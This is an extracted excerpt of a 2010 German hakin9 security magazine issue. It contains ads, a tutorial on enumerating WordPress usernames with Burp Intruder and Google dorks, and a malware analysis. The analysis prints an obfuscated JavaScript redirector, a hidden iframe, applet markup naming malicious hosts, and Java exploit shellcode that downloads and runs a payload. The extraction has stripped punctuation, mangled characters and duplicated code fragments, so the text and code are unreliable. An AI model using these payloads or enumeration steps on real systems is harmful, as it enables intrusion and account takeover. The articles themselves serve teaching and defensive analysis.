Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
hakin9orgde 5
44 Interview mit Ulrike PeterbdquoDie IT ist (und bleibt es sicher auch) eine Maumlnnerdo-maumlne ndash Frauen in der IT-Branche sind ParadiesvoumlgelldquoMehr erfahren Sie aus dem Interview mit Ulrike Peter ndash freie Journalistin und seit zehn Jahren fuumlr unterschiedli-che Unternehmen und Medien in der IT-Branche taumltige PR-Spezialistin
REZENSIONEN46 SAP for DFPS Implementierung und Custo-mizingNicole HuckDas Buch SAP for DFPS Implementierung und Cus-tomizing basiert auf mehr als 20 Jahren Erfahrung die die Autoren insgesamt bei der Entwicklung Imple-mentierung aber auch Schulung der Loumlsung sammeln konnten
5
30 IT-Risikomanagement ndash Wozu brauche ich dasAndreas LentwojtIn der letzen Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Ein-blick in die 27000-Familie gegeben Ein Teil dieser Fa-milie ist die ISO 27005 die sich mit dem IT-Risikoma-nagement befasst
ANGRIFF37 DNS Cache PoisoningPatrick SchmidAls Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschie-ben koumlnnen
INTERVIEW 41 Interview mit Tobias GlemserbdquoSicherheit darf nicht erst am Ende von neuen Anwen-dungen Produkten oder Projekten als Kontrollinstru-ment einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoMehr erfahren Sie aus dem Interview mit Tobias Glem-ser ndash leitender IT-Sicherheitsberater bei der Tele-Con-sulting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbe-reich Penetrationstests
InhaltsverzeIchnIs
Im Zusammenhang mit den Aumlnderungen die in letzter Zeit in dem
deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen moumlchten wir ankuumlndigen dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt
Unser Magazin dient ausschlieszliglich den Erkenntniszwecken
Alle im Magazin praumlsentierten Methoden sollen fuumlr eine sichere IT
fungieren Wir legen einen groszligen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kaumlmpfung von IT Kriminalitaumlt
920106
FUumlR EINSTEIGER
Das Problem mit solchen Authentifizierung ist dass sie nur maximal so sicher sind wie ihr schwaumlchstes Glied Durch das Web 20 wird im-
mer mehr auf Komfort und Benutzerfreundlichkeit ge-setzt wodurch einfache Sicherheitsmechanismen ihre Wirkung verfehlen Bruteforce Angriffe galten durch die schier unendlichen Kombinationsmoumlglichkeiten als bdquonicht mehr praktikabelldquo Viele Seiten erlauben es uns aber die Anzahl an Versuchen drastisch einzuschraumln-ken da sie Informationen preisgeben die einen Angriff oftmals bedeutend einfacher machen
Wenn Sie sich heute im Internet herumtreiben finden Sie sich zwischen Social Networks Auktionsplattfor-men und Tauschboumlrsen wieder Identitaumlten werden im Netz frei und fuumlr jedermann zugaumlnglich eingestellt und manch einem kommt es vor wie wenn er durch Twit-ter und Co mehr uumlber seinen Nachbarn wuumlsste wie uumlber seinen langjaumlhrigen Freund Obwohl viele immer noch der Ansicht sind sich frei und anonym im Internet bewegen zu koumlnnen so stellen sie doch Details uumlber ihr Leben jedem frei zur Verfuumlgung Sie denken ein frei erfundener Benutzername halte die meisten davon ab ihre wahre Identitaumlt herauszufinden Lassen Sie sich gesagt sein das dies ein Irrtum ist ndash ein sehr groszliger Irr-tum Die Gefahr die all dies mit sich bringt ist leicht zur erklaumlren Stellen Sie sich vor sie arbeiten in einem gro-szligen Telekommunikationsunternehmen Uumlber Facebook und Xing halten Sie gerne Kontakt mit Kollegen aus
dem Ausland ndash dafuumlr sind diese Plattformen ja schlieszlig-lich auch bestens geeignet Doch was wenn jemand ihr Konto uumlbernimmt und unter Ihrem Namen dort Humbug treibt Stellen Sie dies nicht sofort fest so kann diese Internetplattform schnell zu einem sehr groszligen Problem werden Schon bei der Anmeldung bei diesen Seiten le-gen wir unsere wichtigen Daten in die Haumlnde der Betrei-ber ohne das uns eigentlich wirklich interessiert wofuumlr diese weiter verwendet werden Erst wenn mal wirklich ein groszliger Skandal an die Oberflaumlche dringt herrscht Empoumlrung und die allgemeine bdquoich hablsquos doch gesagtldquo-Stimmung kommt auf Bei Spammern und Crackern sind Accounts zu Auktionsplattformen Email-Konten und Social Networks sehr beliebt da viele Benutzer fuumlr mehrere Zugaumlnge das selbe Passwort verwenden und so zum Beispiel durch den eBay-Account auf Rechnung des Opfers eingekauft werden kann Ein Benutzer kann hier nur wenige trotzdem aber effektive Maszlignahmen ergreifen Ein sicheres Passwort zu waumlhlen ist der erste und wichtigste Schritt wobei immer mehr Passwoumlrter uumlber nicht-verschluumlsselte Verbindungen und Keylogger abgefangen werden und somit auch das sicherste Pass-wort nutzlos ist Ein zweiter Schritt waumlre verschiedene Passwoumlrter fuumlr die unterschiedlichen Seiten zu verwen-den und diese regelmaumlszligig zu erneuern Dieser Schritt wird aber leider nur sehr selten wirklich umgesetzt da er mit grossem Aufwand verbunden ist und die meisten Benutzer keine Lust haben sich mehrere verschiedene
User Enumeration bei Web-Applikationen
Wo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlnglich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen eingesetz
IN DIESEM ARTIKEL ERFAHREN SIE
-ren
-den
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Kai Renz
User Enumeration bei Web-Applikationen
hakin9orgde 7
anders vorgehen er uumlberpruumlft den Login-Mechanismus auf Ausgaben welche den Benutzernamen verraten oder Hinweise darauf geben koumlnnten ob der zum Test angegebene Name ein wahrer Benutzername ist Hin-weise darauf geben Ruumlckgaben wie bdquoDas fuumlr diesen Be-nutzernamen angegebene Passwort ist nicht korrektldquo oder aumlhnliches Gegengepruumlft werden kann dies durch die Eingabe eines fiktiven Benutzers Variiert die Aus-gabe von der obigen so ist es sehr wahrscheinlich dass der zuvor verwendete Name korrekt war
Ein weiterer Angriffsvektor ist die bdquoPasswort-verges-sen-Funktionldquo Ist solch eine Funktion schlecht ge-schrieben oder ist diese einfach nur zu leichtsinnig dem Benutzer Komfortfunktionen anzubieten koumlnnen fuumlr den Angreifer wichtige Informationen preisgeben werden Eine Fehlkonfiguration bzw leichtsinnige Web 20 Funktion wie die eben angesprochene kann zum Beispiel bei Eingabe der Mailadresse auf der Passwort-Vergessen-Seite mit einem Satz wie bdquoEine Email mit Ihrem neuen Passwort fuumlr den Benutzeraccount ltna-megt wurde erfolgreich an Sie zugestelltldquo antworten wodurch der wahre Benutzer zwar eine Email der An-greifer jedoch auch den Benutzernamen erhaumllt Ist die angegebene Sicherheitsadresse inaktiv oder wird nur sporadisch verwendet so geht diese Email leicht un-ter und der Angreifer kann mit seiner Arbeit fortfahren Ein gutes Beispiel hierfuumlr ist Wordpress Auch in seiner neuesten Version kann uumlber die bdquoPasswort-vergessen-Funktionldquo der Benutzername herausgefunden werden Ein sogenannter Bot-Schutz ist nicht vorhanden so-dass wir das ganze mit einem Webproxy in unserem Fall Burpsuite automatisieren koumlnnen
Durch eine lokale Recherche an einem Wordpress haben wir herausgefunden dass beim Eingeben eines falschen Benutzernamens ein Fehler zuruumlckgegeben wird ERROR Invalid username or e-mail Verwenden wir jedoch den richtigen Benutzernamen erhalten wir ein Check your e-mail for the confirmation link
Passwoumlrter zu merken Oftmals werden zwar viele ver-schiedene Zugangsdaten verwendet durch das haumlufige wechseln werden dann aber eher einfache Passwoumlrter verwendet damit der Benutzer sich diese leicht merken kann
Um einen Zugang zum Benutzerkonto des Anwen-ders zu bekommen sind meist ein Benutzername und ein Passwort noumltig Oftmals fangen hier schon die Pro-bleme an Hat der Angreifer herausgefunden dass sich die Benutzer durch eine Email-Passwort-Kombination anmelden koumlnnen muss er schon mal viel weniger Zeit investieren den Benutzernamen herauszufinden was bei einem Bruteforce-Angriff ein Zeitvorteil sein wel-cher zwischen durchfuumlhrbar und nicht durchfuumlhrbar al-so Erfolg und Misserfolg entscheidet Oftmals reicht al-so schon eine simple Registrierung bei einer Zielseite um die Feinheiten einer Anmeldefunktion herauszufin-den und auszunutzen Kann ein Benutzer seinen Nick-namen frei waumlhlen so sind die Moumlglichkeiten bei einem Bruteforce-Angriff wieder immens sodass der Angrei-fer eine andere Taktik waumlhlen muss Er wird versuchen ohne muumlhsames Durchprobieren von Kombinationen an den Benutzernamen zu kommen oder einen ande-ren Schwachpunkt im System ausnutzen In diesem Artikel werde ich ein paar einfache Moumlglichkeiten dar-stellen um einer Web-Applikation Benutzernamen zu entlocken (User Enumeration) und diese automatisch aufzunehmen
Wie bereits oben beschrieben kann sich der Angrei-fer sofern er dazu berechtigt ist zuerst ein Bild vom Re-gistrierungs- bzw Login-Mechanismus machen Findet er beispielsweiszlige heraus dass der Benutzername eine Mailadresse ist so kann er leicht Suchmaschinen oder Social Networks verwenden um diese herauszufinden Werden frei waumlhlbare Benutzernamen verwendet so faumlllt diese Art von Recherche weitestgehend aus wo-bei natuumlrlich auch hier manchmal ein Gluumlckstreffer da-bei sein kann In so einem Fall wird der Angreifer aber
Abbildung 1 Funktionsweiszlige einfache User Enumeration
Benutzername 1a2a3d4fPasswort sosecret
Benutzername foobarPasswort sosecret
Bruteforce
Benutzername foobarPasswort topsecret
Request Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
